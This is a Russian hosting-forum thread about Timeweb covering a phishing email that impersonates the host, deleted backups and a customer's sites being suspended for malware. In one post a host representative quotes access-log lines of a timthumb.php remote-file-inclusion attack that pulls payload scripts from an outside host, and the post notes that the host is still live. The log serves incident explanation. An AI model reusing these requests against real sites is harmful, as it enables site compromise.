Timeweb - красавчики

TimeWeb.ru
На сайте с 11.11.2007
Offline
62
#21

vitaly_m, да, это мошенническое письмо. Мы уведомляли пользователей об этом (делали рассылку и разместили на сайте уведомление - http://timeweb.ru/about/news/523/)

Добиваются конечно паролей от пу, зачем? Спам, фишинг, и тд. Порочный круг.

С уважением, Timeweb Россия. 8 800 3331081 | info@timeweb.ru | www.timeweb.com/ru (www.timeweb.com/ru)
S
На сайте с 19.07.2010
Offline
41
#22

что тут не понятного? чтобы увести логин и пароль от аккаунта на тайм веб. Таймвебовцы же рассылали письмо предупреждение, что может прийти такое письмо от мошенника о превышении нагрузки

serkl добавил 18.09.2011 в 20:32

зы. опоздал)

mff
На сайте с 21.02.2008
Offline
282
mff
#23

Тоже есть проблемы. Недавно слетела часть админки Битрикса, хотел сделать бэкап - а его то и нет на хостинге. Звонил им, сказали что в связи с заменой скрипта бэкапов - все бэкапы были удалены и пока возможности их сделать нет. Платим за хостинг бешеные деньги. Вот так вот :(

Управление репутацией в сети: https://timbook2.ru/
TimeWeb.ru
На сайте с 11.11.2007
Offline
62
#24
mff:
Тоже есть проблемы. Недавно слетела часть админки Битрикса, хотел сделать бэкап - а его то и нет на хостинге. Звонил им, сказали что в связи с заменой скрипта бэкапов - все бэкапы были удалены и пока возможности их сделать нет. Платим за хостинг бешеные деньги. Вот так вот :(

Была такая проблема. Вокруг бэкапов очень много работы. Это важно, мы это понимаем. Но также важно и сохранить стабильную работу сервера в это период.

Сейчас введена в работу новая система, когда бэкап всего сервера происходит за несколько часов практически не оказывая негативного влияния на стабильность работы сервисов. Кроме того, бэкап делается удаленно (для последних ~40ка серверов), что существенно повышает его надежность.

В ближайшее время на такую схему будут переведены все серверы.

Цена - понятие относительное в любом случае.

Мы стараемся сделать отношение цены к качеству максимально выгодным для пользователей, при этом сохранив и увеличив все преимущества наших услуг.

Проблему поддержи мы тоже решаем, идет набор и обучение новых сотрудников, готовим масштабный FAQ, и тд.

Например, с недавнего времени на серверах мы стали использовать топовые процессоры из 56xx серии xeon-ов (5690 вместо 5650).

Ждем e7 с нетерпением;) интересно сравнить с амд 61xx.

ps.

Готовим запуск интересных и нужных штук, следите;)

iHead
На сайте с 25.04.2008
Offline
137
#25
vitaly_m:
Мне сейчас пришло прикольное письмо о якобы превышении нагрузки, от якобы TimewebTeam примерно такого содержания

идут по whois.

на один из емайлов нам пришло такое же письмо.

из сети мастерхоста.

15 сентября написал в abuse мастерхоста о спаме+фишинге.

ответили только сегодня 18 сентября в 2 ночи.

3 суток мастерхост реагировал на абузу...

Рекомендуемый хостинг партнер 1С-Битрикс (https://www.ihead.ru/bitrix/), PHP-хостинг (https://www.ihead.ru/php/), доверенный партнер RU-CENTER (https://www.ihead.ru/news/573.html), официальный представитель REG.RU в Кирове (https://www.ihead.ru/news/851.html)
VM
На сайте с 31.03.2009
Offline
81
#26

Спасибо. понял. Но вот письмо предупреждение мне не приходило.

Качественные и недорогие (от 169р за 1 Gb Ram) KVM VPS ssd (http://ruweb.net/?from=23123) в России которые... работают.
TimeWeb.ru
На сайте с 11.11.2007
Offline
62
#27

vitaly_m, мы отправляли предупреждение на административный адрес аккаунта. Злоумышленники делали рассылку на контактный адрес домена, что собственно им не принесет ожидаемого результата.

Если дело не в этом и в спаме нет письма - нужно разбираться.

[Удален]
#28

Такая же проблема как и у ТС.

Вчера с утра отключили 20 сайтов с одного аккаунта с формулировкой:

На вашем аккаунте artkirov периодически запускается вредоносное Программное обеспечение, данные аккаунта перенесены в папку infected. Вам следует провести аудит работы сайтов, выявить вредоносное ПО, после чего вы можете перенести данные в корень аккаунта.

Естественно сразу все проверил, ничего подозрительного не обнаружил. У меня там одни стандартные сайты-визитки. Решил попросить поддержку помочь, хотябы сказать на какой сайт идет притензия. В итоге на все просьбы помочь и вопросы получал:

Тикет передан системному администратору

В понедельник к обеду, админ всетаки решил появится и разрешил все 20 сайтов самостоятельно перенести обратно в корень сайта из папки infected (в эту папку они были перенесены после того как они чето заподозрили).

Сайты не работали больше суток. Часть потеряла страницы в индексе.

------------------------------------------

После того как сайты включились, попросил поддержку объснить на каком сайте была вредоносное ПО и как оно выглядело, чтобы впредь внимательнее следить и возможно самому сразу удалять такие подозрительные файлы если они еще появятся. На что получил ответ:

К сожалению, такой информации у нас нет.

Делаю вывод: никакого ПО и в помине не было, так от нефик делать отрубили сайты поржать. Другого объяснения у меня нет...

Особенно понравилось ввиду этого, что обратно сайты переносить заставили меня, типа мы накосячили, а ты исправляй.

--------------------

P.S. Хостинг и поддержка до последнего времени очень нравились, думал наконецто нашел идеал, но последние события, в том числе и частая недоступность сайтов скоро сделают свое дело. Руководству компании нужно сильно задуматься и решить вопрос с неквалифицированными кадрами.

TimeWeb.ru
На сайте с 11.11.2007
Offline
62
#29

Добрый всем,

L-servis, проблема действительно существовала, вы-же не думаете, что мы отключаем сайты для "поржать"?

Наши сотрудники действительно поспешили (приношу извинения) и досконально не проанализировали ситуацию с взломом, в вашем случае это особенно не легко (из-за количества сайтов), но все-же.

было так:

|-perl(4911,x)

|-perl(23715,x)

вот отсюда:

x 85.10.206.254 - - [04/Nov/2011:20:41:02 +0400] "GET /wp-content/themes/sportpress/scripts/timthumb.php?src=http://flickr.com.bigtimeoutfitters.com/timthumb/injector/injector.php HTTP/1.0" 200 1002 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"

x 85.10.206.254 - - [04/Nov/2011:20:41:03 +0400] "GET /wp-content/themes/sportpress/scripts/timthumb.php?src=http://flickr.com.bigtimeoutfitters.com/timthumb/perl/perl.php HTTP/1.0" 200 994 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"

x 85.10.206.254 - - [04/Nov/2011:20:41:05 +0400] "GET /wp-content/themes/sportpress/scripts/cache/20bb7afadd2fc566fae951df8841d4d8.php HTTP/1.0" 200 260345 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"

вот это http://flickr.com.bigtimeoutfitters.com/timthumb/perl/perl.php____ до сих пор живо.

проверяйте, пожалуйста, сайты.

KU
На сайте с 17.07.2008
Offline
251
#30

timthumb.php обновите на сайтах.

http://timthumb.googlecode.com/svn/trunk/timthumb.php - вот последняя версия с закрытой уязвимостью.

Хостинг ( https://good-host.net ) / Linux VPS ( https://good-host.net/vps ) / Windows VPS ( https://good-host.net/windows-vps ) / Выделенные серверы ( https://good-host.net/dedicated ) 14 лет онлайн!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий